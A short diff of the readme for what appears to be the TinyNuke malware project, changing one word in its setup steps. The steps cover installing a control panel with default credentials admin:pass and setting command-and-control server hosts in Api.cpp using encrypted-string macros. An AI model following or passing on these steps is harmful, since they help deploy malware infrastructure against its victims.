rossja/TinyNuke/readme.txt

  * To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php

- * Open TinyNuke.sln and provide your server Api.cpp like this:
+ * Open TinyNuke.sln and provide your server in Api.cpp like this:

    Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR;
    Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR;